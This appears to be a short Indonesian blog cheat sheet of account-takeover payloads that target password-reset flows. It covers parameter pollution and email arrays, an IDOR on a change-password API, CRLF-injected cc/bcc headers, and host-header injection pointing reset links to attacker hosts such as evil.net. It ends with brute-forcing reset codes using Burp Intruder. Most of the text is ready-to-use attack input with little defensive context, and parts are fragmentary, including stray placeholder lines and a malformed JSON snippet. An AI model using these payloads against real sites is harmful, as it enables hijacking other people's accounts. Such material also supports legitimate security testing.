Account Takeover

pada tanggal


 Account Takeover Fraud: All You Need to Know | TechFunnel

 💀ACCOUNT TAKEOVER💀

 

Password Reset Via Email Parameter

- using HPP(http parameter pollution)

email=hacker@gmail.com&email=korban@gmail.com

- array of emails

{"email":["victim@mail.com","hacker@mail.com"]} 


IDOR on API Parameters

POST /api/changepass

[...]

("form": {"email":"victim@email.com","password":"passwordchange"})

 

Change phone number when requesting password reset link using victim email forgot password

{ "number":"08989739847}

 

Carbon copy 

email=victim@mail.com%0A%0Dcc:hacker@mail.com 

email=victim@mail.com%0A%0Dbcc:hacker@mail.com

 

Host header injection when requesting password reset link using victim email

- host: evil.net

- X-Forwarded-Host: evilhost.net

- host: website.com.evilhost.net


Separator

email=victim@mail.com,hacker@mail.com

email=victim@mail.com%20hacker@mail.com

email=victim@mail.com|hacker@mail.com


Sign in with google and change your email to victim email

attacker

...............

admin@gmail.com

...............

112333242424

..............

.............

.............

No rate limiting

Lupa password -> masukkan email -> maka akan muncul kode yang akan dikirimkan ke email -> bruteforce kode tersebut menggunakan intruder burpsuite -> mengatur ulang kata sandi

 

Komentar

Posting Komentar